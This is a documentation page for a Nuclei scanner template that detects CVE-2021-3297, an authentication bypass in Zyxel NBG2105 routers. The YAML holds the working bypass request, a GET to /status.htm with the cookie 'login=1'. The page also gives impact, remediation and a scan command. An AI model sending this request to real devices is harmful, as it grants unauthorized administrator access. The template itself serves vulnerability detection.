Skip to content
Nuclei Templates

Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass

ID: CVE-2021-3297

Severity: high

Author: gy741

Tags: cve,cve2021,zyxel,auth-bypass,router

Description

Section titled “Description”

Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.

YAML Source

Section titled “YAML Source”
id: CVE-2021-3297


info:
  name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
  author: gy741
  severity: high
  description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device.
  remediation: |
    Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability.
  reference:
    - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
    - https://www.zyxel.com/us/en/support/security_advisories.shtml
    - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3297
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2021-3297
    cwe-id: CWE-287
    epss-score: 0.26301
    epss-percentile: 0.96731
    cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zyxel
    product: nbg2105_firmware
  tags: cve,cve2021,zyxel,auth-bypass,router


http:
  - raw:
      - |
        GET /status.htm HTTP/1.1
        Host: {{Hostname}}
        Cookie: language=en; login=1


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Running Time"
          - "Firmware Version"
          - "Firmware Build Time"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a0046304402203e506be2bf846ef14afc27b7fdcf14653821a643c82604562e60c5d8ea73159c022007662186b2fb62039d7e8e5f0923e65878c0e332660e70313bfa883f4b842543:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3297.yaml"

View on Github